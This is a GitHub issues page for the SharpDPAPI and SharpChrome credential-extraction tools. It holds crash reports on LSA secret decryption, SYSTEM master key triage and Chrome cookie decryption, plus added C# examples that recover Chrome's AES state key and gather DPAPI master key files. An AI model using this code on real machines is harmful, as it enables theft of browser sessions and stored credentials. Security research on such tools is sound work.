
sharpdpapi's People

Contributors

atticuss-sra, bebop79, byinarie, clod81, djhohnstein, fsacer, guervild, harmj0y, leechristensen, ptr0x1, rxwx, subat0mik


sharpdpapi's Issues

Crashes on Windows 11

Hi, I just grabbed the latest version and compiled it (release, not debug).
I get the below error on Windows 11 (23H2).

Text error:

C:\tools\SharpDPAPI\SharpDPAPI\bin\Release>whoami
nt authority\system

C:\tools\SharpDPAPI\SharpDPAPI\bin\Release>SharpDPAPI.exe machinetriage

  __                 _   _       _ ___
 (_  |_   _. ._ ._  | \ |_) /\  |_) |
 __) | | (_| |  |_) |_/ |  /--\ |  _|_
                |
  v1.11.3


[*] Action: Machine DPAPI Credential, Vault, and Certificate Triage


[!] Unhandled SharpDPAPI exception:

System.Security.Cryptography.CryptographicException: The cipher mode specified requires that an initialization vector (IV) be used.
   at System.Security.Cryptography.CapiSymmetricAlgorithm.ProcessIV(Byte[] iv, Int32 blockSize, CipherMode cipherMode)
   at System.Security.Cryptography.CapiSymmetricAlgorithm..ctor(Int32 blockSize, Int32 feedbackSize, SafeCspHandle provider, SafeCapiKeyHandle key, Byte[] iv, CipherMode cipherMode, PaddingMode paddingMode, EncryptionMode encryptionMode)
   at System.Security.Cryptography.AesCryptoServiceProvider.CreateDecryptor(SafeCapiKeyHandle key, Byte[] iv)
   at SharpDPAPI.Crypto.LSAAESDecrypt(Byte[] key, Byte[] data)
   at SharpDPAPI.LSADump.GetLSAKey()
   at SharpDPAPI.LSADump.GetLSASecret(String secretName)
   at SharpDPAPI.LSADump.GetDPAPIKeys(Boolean show)
   at SharpDPAPI.Triage.TriageSystemMasterKeys(Boolean show)
   at SharpDPAPI.Commands.Machinetriage.Execute(Dictionary`2 arguments)
   at SharpDPAPI.Domain.CommandCollection.ExecuteCommand(String commandName, Dictionary`2 arguments)
   at SharpDPAPI.Program.MainExecute(String commandName, Dictionary`2 parsedArgs)


SharpDPAPI completed in 00:00:00.0240340
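The exception text in the trace is literal: AesCryptoServiceProvider.CreateDecryptor was handed a null IV while the mode was CBC, and CAPI refuses that combination before touching any data. The following is an added example, not SharpDPAPI's own LSAAESDecrypt, showing a block-wise AES-256 routine in the shape LSA secret decryption takes in impacket and mimikatz (each 16-byte block processed with a fresh zero IV), with the IV always passed explicitly. The key and plaintext are constructed for the demonstration; the final try block reproduces the failure from the trace on purpose.

```csharp
using System;
using System.Security.Cryptography;
using System.Text;

// Added example, not SharpDPAPI code. Block-wise AES-256 in the shape LSA secret
// decryption takes in impacket and mimikatz: every 16-byte block is processed with
// a fresh zero IV, and the IV is always passed explicitly so CBC never sees null.
static class LsaStyleAes
{
    public static byte[] Transform(byte[] key, byte[] data, bool decrypt)
    {
        if (key == null || key.Length != 32)
            throw new ArgumentException("AES-256 key expected", nameof(key));

        var zeroIv = new byte[16];                    // explicit IV: CBC refuses a null one
        int total = (data.Length + 15) / 16 * 16;     // short tail is zero-padded to a block
        var output = new byte[total];

        using (var aes = new AesCryptoServiceProvider())
        {
            aes.Key = key;
            aes.Mode = CipherMode.CBC;
            aes.Padding = PaddingMode.None;           // blocks are handled one at a time

            for (int off = 0; off < data.Length; off += 16)
            {
                var block = new byte[16];
                Array.Copy(data, off, block, 0, Math.Min(16, data.Length - off));

                using (var t = decrypt ? aes.CreateDecryptor(key, zeroIv)
                                       : aes.CreateEncryptor(key, zeroIv))
                {
                    var result = t.TransformFinalBlock(block, 0, 16);
                    Array.Copy(result, 0, output, off, 16);
                }
            }
        }
        return output;
    }

    static void Main()
    {
        // Constructed 32-byte key and a 32-byte plaintext (two full blocks).
        var key = new byte[32];
        for (int i = 0; i < key.Length; i++) key[i] = (byte)(i * 7 + 1);
        const string message = "DPAPI_SYSTEM: constructed value.";
        var plain = Encoding.ASCII.GetBytes(message);

        var cipher = Transform(key, plain, decrypt: false);
        var back = Transform(key, cipher, decrypt: true);
        Console.WriteLine("round trip ok: " + (Encoding.ASCII.GetString(back) == message));

        // What the stack trace above shows: a null IV in CBC mode throws immediately.
        try
        {
            using (var aes = new AesCryptoServiceProvider { Key = key, Mode = CipherMode.CBC })
                aes.CreateDecryptor(key, null);
        }
        catch (Exception e)
        {
            Console.WriteLine(e.GetType().Name + ": " + e.Message);
        }
    }
}
```

Because each block is decrypted with the same zero IV, this is functionally ECB over 16-byte chunks; the point of the example is only that the IV argument is never null. Whether the Windows 11 behaviour reported above comes from a changed LSA key blob or from the null IV alone is not established by the trace.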

Must be elevated to triage SYSTEM DPAPI Credentials!

Hello,
I compiled SharpChrome and it works well.

I compiled SharpDPAPI and when I run commands it gives this:

C:\Users\TESTACCOUNT\Downloads\SharpDPAPI-master\SharpDPAPI-master\SharpDPAPI-master\SharpDPAPI\bin\Release>SharpDPAPI.exe machinevaults


  __                 _   _       _ ___
 (_  |_   _. ._ ._  | \ |_) /\  |_) |
 __) | | (_| |  |_) |_/ |  /--\ |  _|_
                |
  v1.6.1

[*] Action: Machine DPAPI Vault Triage

[X] Must be elevated to triage SYSTEM DPAPI Credentials!

My AV (Avast) was disabled while compiling and also while running SharpDPAPI.exe machinevaults.

Any info much appreciated.

UPDATE:
I was running from VS developer cmd.

[!] Unhandled SharpDPAPI exception:

Hello,
When running SharpDPAPI.exe I am getting this:

C:\Users\TESTACCOUNT\Downloads\SharpDPAPI-master\SharpDPAPI-master\SharpDPAPI-master\SharpDPAPI\bin\Release>SharpDPAPI.exe machinevaults


  __                 _   _       _ ___
 (_  |_   _. ._ ._  | \ |_) /\  |_) |
 __) | | (_| |  |_) |_/ |  /--\ |  _|_
                |
  v1.6.1

[*] Action: Machine DPAPI Vault Triage

[*] Elevating to SYSTEM via token duplication for LSA secret retrieval
[*] RevertToSelf()

[*] Secret  : DPAPI_SYSTEM
[*]    full: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
[*]    m/u : xxxxxxxxxxxxxxxxxxxxxxx / xxxxxxxxxxxxxxxxxxxxxxxxxx

[!] Unhandled SharpDPAPI exception:

System.UnauthorizedAccessException: Access to the path 'C:\Windows\System32\Microsoft\Protect\Recovery\Recovery.dat{8bf0a20f-5420-11e9-ac9f-e84e06061855}.TM.blf' is denied.
   at System.IO.__Error.WinIOError(Int32 errorCode, String maybeFullPath)
   at System.IO.FileStream.Init(String path, FileMode mode, FileAccess access, Int32 rights, Boolean useRights, FileShare share, Int32 bufferSize, FileOptions options, SECURITY_ATTRIBUTES secAttrs, String msgPath, Boolean bFromProxy, Boolean useLongPath, Boolean checkHost)
   at System.IO.FileStream..ctor(String path, FileMode mode, FileAccess access, FileShare share, Int32 bufferSize, FileOptions options, String msgPath, Boolean bFromProxy, Boolean useLongPath, Boolean checkHost)
   at System.IO.File.InternalReadAllBytes(String path, Boolean checkHost)
   at SharpDPAPI.Triage.TriageSystemMasterKeys(Boolean show)
   at SharpDPAPI.Commands.Machinevaults.Execute(Dictionary`2 arguments)
   at SharpDPAPI.Domain.CommandCollection.ExecuteCommand(String commandName, Dictionary`2 arguments)
   at SharpDPAPI.Program.Main(String[] args)

My compiled SharpChrome.exe runs well.

Any info much appreciated.

Debugging Issue & Marshal.PtrToStructure() question

When debugging SharpDPAPI with the below config/flags, I had a question on why the pointer is not showing at the correct address the debugger reports.

Then I realized it might be due to misdeclared variables within the struct:

        using System;
        using System.Runtime.InteropServices;

        [StructLayout(LayoutKind.Sequential)]
        public struct LSA_UNICODE_STRING : IDisposable
        {
            public ushort Length;          // byte length of the string, without terminator
            public ushort MaximumLength;   // byte length of the backing buffer
            public ushort certLen;         // extra field added while debugging (see below)
            public IntPtr buffer;          // PWSTR

            public LSA_UNICODE_STRING(string s)
            {
                Length = (ushort)(s.Length * 2);
                MaximumLength = (ushort)(Length + 2);
                certLen = (ushort)(Length + 2);
                buffer = Marshal.StringToHGlobalUni(s);   // unmanaged copy, freed in Dispose
            }

            public void Dispose()
            {
                Marshal.FreeHGlobal(buffer);
                buffer = IntPtr.Zero;
            }

            public override string ToString()
            {
                // Reads up to the first null; relies on the buffer being terminated.
                return Marshal.PtrToStringUni(buffer);
            }
        }

I then saw the reference in the mimikatz header and added another declaration for certLen. That matched the length appearing 3 times in memory in the screenshots, both in the memory view and when stepping through.

But previously it also worked just fine without certLen. So I was wondering: does Marshal.PtrToStructure() in

    Interop.LSA_UNICODE_STRING lusSecretData = (Interop.LSA_UNICODE_STRING)Marshal.PtrToStructure(PrivateData, typeof(Interop.LSA_UNICODE_STRING));

just magically find the IntPtr in the memory of PrivateData, which is really after certLen + 2 null bytes?

Sorry if I'm being confusing here.
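Whether the extra ushort changes anything depends only on where the marshaller places the pointer field, which Marshal.OffsetOf and Marshal.SizeOf report directly. The following is an added example, not SharpDPAPI code: it declares the documented LSA_UNICODE_STRING (Length, MaximumLength, Buffer) next to the variant from the post, prints both layouts, then writes a constructed string through the documented layout and reads it back through the extended one. The struct names and the sample string are mine.

```csharp
using System;
using System.Runtime.InteropServices;

// Added example, not SharpDPAPI code. Compares the marshalled layout of the documented
// LSA_UNICODE_STRING with the variant that inserts a third ushort before the pointer.
[StructLayout(LayoutKind.Sequential)]
struct LsaUnicodeString
{
    public ushort Length;
    public ushort MaximumLength;
    public IntPtr Buffer;
}

[StructLayout(LayoutKind.Sequential)]
struct LsaUnicodeStringWithCertLen
{
    public ushort Length;
    public ushort MaximumLength;
    public ushort certLen;       // the field added in the post
    public IntPtr Buffer;
}

static class LayoutCheck
{
    static void Describe(Type t)
    {
        Console.WriteLine($"{t.Name}: Marshal.SizeOf = {Marshal.SizeOf(t)}");
        foreach (var f in t.GetFields())
            Console.WriteLine($"  {f.Name,-14} offset {Marshal.OffsetOf(t, f.Name)}");
    }

    static void Main()
    {
        Console.WriteLine($"IntPtr.Size = {IntPtr.Size}");
        Describe(typeof(LsaUnicodeString));
        Describe(typeof(LsaUnicodeStringWithCertLen));

        const string s = "DPAPI_SYSTEM";   // constructed sample string
        var native = new LsaUnicodeString
        {
            Length = (ushort)(s.Length * 2),
            MaximumLength = (ushort)(s.Length * 2 + 2),
            Buffer = Marshal.StringToHGlobalUni(s),
        };

        // Write the documented layout to unmanaged memory, read it back through the extended one.
        int size = Math.Max(Marshal.SizeOf(typeof(LsaUnicodeString)),
                            Marshal.SizeOf(typeof(LsaUnicodeStringWithCertLen)));
        IntPtr raw = Marshal.AllocHGlobal(size);
        try
        {
            Marshal.Copy(new byte[size], 0, raw, size);          // zero the padding bytes
            Marshal.StructureToPtr(native, raw, false);
            var ext = Marshal.PtrToStructure<LsaUnicodeStringWithCertLen>(raw);

            Console.WriteLine($"certLen read back = {ext.certLen}");
            Console.WriteLine($"Buffer preserved  = {ext.Buffer == native.Buffer}");
            if (ext.Buffer != IntPtr.Zero)
                Console.WriteLine("string via extended struct: " +
                                  Marshal.PtrToStringUni(ext.Buffer, ext.Length / 2));
        }
        finally
        {
            Marshal.FreeHGlobal(raw);
            Marshal.FreeHGlobal(native.Buffer);
        }
    }
}
```

On a 64-bit process the pointer field is aligned to 8 bytes, so both structs report Buffer at offset 8 and a size of 16: certLen merely occupies two of the four padding bytes, reads back as 0, and the pointer is unaffected, which is why both declarations worked. In a 32-bit process the documented struct is 8 bytes with Buffer at offset 4, while the extended one is 12 bytes with Buffer at offset 8, so the read-back pointer would be wrong; the extra field is therefore not harmless in general.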

Machinemasterkeys fails on some Recovery files

C:\>C:\tools\SharpDPAPI\SharpDPAPI\bin\Debug\SharpDPAPI.exe machinemasterkeys
  __                 _   _       _ ___
 (_  |_   _. ._ ._  | \ |_) /\  |_) |
 __) | | (_| |  |_) |_/ |  /--\ |  _|_
                |
  v1.6.1


[*] Action: Machine DPAPI Masterkey File Triage

[*] Elevating to SYSTEM via token duplication for LSA secret retrieval
[*] RevertToSelf()

[*] Secret  : DPAPI_SYSTEM
[*]    full: <snip>
[*]    m/u : <snip>


[!] Unhandled SharpDPAPI exception:

System.UnauthorizedAccessException: Access to the path 'C:\Windows\System32\Microsoft\Protect\Recovery\Recovery.dat{86283df8-8d88-4a51-957d-449ff1919746}.TM.blf' is denied.
   at System.IO.__Error.WinIOError(Int32 errorCode, String maybeFullPath)
   at System.IO.FileStream.Init(String path, FileMode mode, FileAccess access, Int32 rights, Boolean useRights, FileShare share, Int32 bufferSize, FileOptions options, SECURITY_ATTRIBUTES secAttrs, String msgPath, Boolean bFromProxy, Boolean useLongPath, Boolean checkHost)
   at System.IO.FileStream..ctor(String path, FileMode mode, FileAccess access, FileShare share, Int32 bufferSize, FileOptions options, String msgPath, Boolean bFromProxy, Boolean useLongPath, Boolean checkHost)
   at System.IO.File.InternalReadAllBytes(String path, Boolean checkHost)
   at SharpDPAPI.Triage.TriageSystemMasterKeys(Boolean show) in C:\tools\SharpDPAPI\SharpDPAPI\lib\Triage.cs:line 161
   at SharpDPAPI.Commands.Machinemasterkeys.Execute(Dictionary`2 arguments) in C:\tools\SharpDPAPI\SharpDPAPI\Commands\Machinemasterkeys.cs:line 15
   at SharpDPAPI.Domain.CommandCollection.ExecuteCommand(String commandName, Dictionary`2 arguments) in C:\tools\SharpDPAPI\SharpDPAPI\Domain\CommandCollection.cs:line 46
   at SharpDPAPI.Program.Main(String[] args) in C:\tools\SharpDPAPI\SharpDPAPI\Program.cs:line 24
FullName                                                                                                                                     
--------                                                                                                                                     
C:\Windows\System32\Microsoft\Protect\Recovery                                                                                               
C:\Windows\System32\Microsoft\Protect\S-1-5-18                                                                                               
C:\Windows\System32\Microsoft\Protect\Recovery\Recovery.dat                                                                                  
C:\Windows\System32\Microsoft\Protect\Recovery\Recovery.dat.LOG1                                                                             
C:\Windows\System32\Microsoft\Protect\Recovery\Recovery.dat.LOG2                                                                             
C:\Windows\System32\Microsoft\Protect\Recovery\Recovery.dat{440de6b5-c574-4468-b756-a0b8ea25fdc0}.TM.blf                                     
C:\Windows\System32\Microsoft\Protect\Recovery\Recovery.dat{ea68be95-bae7-405a-8b69-51103f0bfa0d}.TMContainer00000000000000000001.regtrans-ms
C:\Windows\System32\Microsoft\Protect\Recovery\Recovery.dat{7c30ad6c-e65d-42c6-b7a6-04acffb7cb1f}.TMContainer00000000000000000002.regtrans-ms
C:\Windows\System32\Microsoft\Protect\S-1-5-18\User                                                                                          
C:\Windows\System32\Microsoft\Protect\S-1-5-18\d60dafcc-6ea7-4d5c-a955-c2ab0e6017b6  
C:\Windows\System32\Microsoft\Protect\S-1-5-18\b32c164f-b24a-414b-98b5-0a6640eab86c                                                          
C:\Windows\System32\Microsoft\Protect\S-1-5-18\15c3da9d-e25c-41ff-97dc-449a0d7d58dd                                                          
C:\Windows\System32\Microsoft\Protect\S-1-5-18\Preferred                                                                                     
C:\Windows\System32\Microsoft\Protect\S-1-5-18\User\3700badb-931e-44b5-b3f5-ea3b232c32d6                                                     
C:\Windows\System32\Microsoft\Protect\S-1-5-18\User\1ede99f5-79b5-418f-9c40-20deb084e219                                                     
C:\Windows\System32\Microsoft\Protect\S-1-5-18\User\eff1de12-4bb7-4760-9dfe-e9626bef6405                                                     
C:\Windows\System32\Microsoft\Protect\S-1-5-18\User\Preferred                                                                                
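Both this report and the earlier "[!] Unhandled SharpDPAPI exception" one fail in the same way: the triage reads every file under Protect, and the *.TM.blf transaction log in the Recovery directory cannot be opened even as SYSTEM, so one unreadable file aborts the whole run. The following is an added example, not SharpDPAPI's TriageSystemMasterKeys: it walks the two SYSTEM master key directories from the listing above, reads only files whose name parses as a GUID (which excludes Preferred, Recovery.dat and its .LOG*/.TM.blf/.regtrans-ms artifacts), checks the header against the mimikatz KULL_M_DPAPI_MASTERKEYS layout, and reports a per-file access error instead of throwing. The class and method names are mine; it needs to run as SYSTEM to read anything.

```csharp
using System;
using System.Collections.Generic;
using System.IO;
using System.Text;

// Added example, not SharpDPAPI code. Collects SYSTEM DPAPI master key files while
// tolerating unreadable neighbours such as the locked *.TM.blf transaction logs.
static class SystemMasterKeyFiles
{
    static readonly string ProtectRoot =
        Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.System),
                     @"Microsoft\Protect");

    // The two master key directories from the listing above.
    static readonly string[] Dirs =
    {
        Path.Combine(ProtectRoot, "S-1-5-18"),
        Path.Combine(ProtectRoot, @"S-1-5-18\User"),
    };

    // Header layout per mimikatz KULL_M_DPAPI_MASTERKEYS: DWORD dwVersion at 0,
    // two more DWORDs, then the GUID as 36 UTF-16 characters (72 bytes) at offset 12.
    static bool LooksLikeMasterKey(string guidName, byte[] b)
    {
        if (b.Length < 12 + 72) return false;
        string guid = Encoding.Unicode.GetString(b, 12, 72);
        return string.Equals(guid, guidName, StringComparison.OrdinalIgnoreCase);
    }

    public static Dictionary<string, byte[]> Collect()
    {
        var keys = new Dictionary<string, byte[]>(StringComparer.OrdinalIgnoreCase);
        foreach (var dir in Dirs)
        {
            if (!Directory.Exists(dir)) { Console.WriteLine($"[X] missing {dir}"); continue; }
            foreach (var path in Directory.EnumerateFiles(dir))
            {
                string name = Path.GetFileName(path);
                if (!Guid.TryParseExact(name, "D", out _)) continue;   // not a master key file
                try
                {
                    byte[] data = File.ReadAllBytes(path);
                    if (LooksLikeMasterKey(name, data))
                        keys[name] = data;
                    else
                        Console.WriteLine($"[X] {name}: header does not match, skipped");
                }
                catch (Exception e) when (e is UnauthorizedAccessException || e is IOException)
                {
                    // Report and move on instead of aborting the whole triage.
                    Console.WriteLine($"[X] {path}: {e.Message}");
                }
            }
        }
        return keys;
    }

    static void Main()
    {
        foreach (var kv in Collect())
            Console.WriteLine($"[*] {kv.Key}  {kv.Value.Length} bytes  version {BitConverter.ToUInt32(kv.Value, 0)}");
    }
}
```

The GUID-name filter is what keeps the Recovery directory out of the picture: nothing in it is a master key file, and its transaction artifacts are exactly the files that the stack traces above show being denied.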

Cookie unprotect Not working with latest chrome version 104

Hi Will,
I think this command doesn't work anymore: SharpChrome.exe cookies /unprotect, since the location of the cookie file is now C:\Users\*\AppData\Local\Google\Chrome\User Data\Default\Network.

Output taken from the BH2022 ATTA lab:

  __                 _
 (_  |_   _. ._ ._  /  |_  ._ _  ._ _   _
 __) | | (_| |  |_) \_ | | | (_) | | | (/_
                |
  v1.11.1


[*] Action: Chrome Saved Cookies Triage

[*] Triaging non-expired cookies. Use '/showall' to display ALL cookies.

[*] Triaging Chrome Cookies for current user


[*] AES state key file : C:\Users\thor\AppData\Local\Google\Chrome\User Data\Local State
[*] AES state key      : 001B279C498A9BA70B76E301E45D7B2752475FEFA2690EAA17BAE06616489018

Fails to run SharpChrome when Chrome is open

I get an error when Chrome is open.
Using SharpChrome v1.12.0, Windows 11, Google Chrome Version 122.0.6261.129

System.NullReferenceException: Object reference not set to an instance of an object.
   at SharpChrome.Chrome.ParseChromeCookies(Dictionary`2 MasterKeys, String cookieFilePath, String displayFormat, Boolean showAll, Boolean unprotect, String cookieRegex, String urlRegex, Boolean setneverexpire, Byte[] aesStateKey, Boolean quiet)
   at SharpChrome.Chrome.TriageChromeCookies(Dictionary`2 MasterKeys, String computerName, String userFolder, String displayFormat, Boolean showAll, Boolean unprotect, String cookieRegex, String urlRegex, Boolean setneverexpire, String stateKey, String browser, Boolean quiet)
   at SharpChrome.Commands.Cookies.Execute(Dictionary`2 arguments)
   at SharpChrome.Domain.CommandCollection.ExecuteCommand(String commandName, Dictionary`2 arguments)
   at SharpChrome.Program.MainExecute(String commandName, Dictionary`2 parsedArgs)
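The two SharpChrome reports above share a root: the Cookies database is not where, or not in the state, the tool expects. Newer Chrome builds keep it at <profile>\Network\Cookies rather than <profile>\Cookies, and while Chrome is running it holds the SQLite file open, so a read that silently yields nothing ends as a NullReferenceException deep in the parser. The following is an added example, not SharpChrome code: it resolves the database from both locations, copies it to a temporary path before use and surfaces a copy failure as the error, and recovers the AES state key from Local State (the os_crypt encrypted_key value is base64 of the literal prefix "DPAPI" followed by a CryptProtectData blob under the current user). Class, method names and the regex-based JSON lookup are mine.

```csharp
using System;
using System.IO;
using System.Security.Cryptography;
using System.Text;
using System.Text.RegularExpressions;

// Added example, not SharpChrome code. Locates the Chrome cookie database in both its
// current and legacy locations, copies it before reading, and unprotects the AES
// state key from Local State. Requires a reference to System.Security (or the
// System.Security.Cryptography.ProtectedData package) for ProtectedData.
static class ChromeCookieSource
{
    static readonly string UserData = Path.Combine(
        Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData),
        @"Google\Chrome\User Data");

    public static string FindCookieDb(string profile = "Default")
    {
        string[] candidates =
        {
            Path.Combine(UserData, profile, @"Network\Cookies"),   // current location
            Path.Combine(UserData, profile, "Cookies"),            // legacy location
        };
        foreach (var c in candidates)
            if (File.Exists(c)) return c;
        throw new FileNotFoundException("no Cookies database found", candidates[0]);
    }

    // Chrome keeps the database open; work on a copy and report if even that fails.
    public static string CopyForReading(string dbPath)
    {
        string tmp = Path.Combine(Path.GetTempPath(), Path.GetRandomFileName());
        try
        {
            File.Copy(dbPath, tmp, overwrite: true);
        }
        catch (IOException e)
        {
            throw new IOException($"could not copy {dbPath} (is Chrome running?): {e.Message}", e);
        }
        return tmp;
    }

    public static byte[] GetStateKey()
    {
        string localState = File.ReadAllText(Path.Combine(UserData, "Local State"));
        var m = Regex.Match(localState, @"""encrypted_key""\s*:\s*""([^""]+)""");
        if (!m.Success) throw new InvalidDataException("os_crypt.encrypted_key not found");

        byte[] blob = Convert.FromBase64String(m.Groups[1].Value);
        const string prefix = "DPAPI";
        if (blob.Length <= prefix.Length ||
            Encoding.ASCII.GetString(blob, 0, prefix.Length) != prefix)
            throw new InvalidDataException("unexpected encrypted_key prefix");

        var dpapiBlob = new byte[blob.Length - prefix.Length];
        Array.Copy(blob, prefix.Length, dpapiBlob, 0, dpapiBlob.Length);
        // Same user context that Chrome protected the key under.
        return ProtectedData.Unprotect(dpapiBlob, null, DataProtectionScope.CurrentUser);
    }

    static void Main()
    {
        string db = FindCookieDb();
        Console.WriteLine("[*] cookie db     : " + db);
        string copy = CopyForReading(db);
        Console.WriteLine("[*] working copy  : " + copy);
        byte[] key = GetStateKey();
        Console.WriteLine("[*] AES state key : " + BitConverter.ToString(key).Replace("-", ""));
        File.Delete(copy);
    }
}
```

The recovered 32-byte key is what the "AES state key" line in the output above shows; cookie values prefixed with "v10" are AES-256-GCM ciphertexts under it (12-byte nonce after the prefix, 16-byte tag at the end), which is the decryption step that follows on the working copy.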
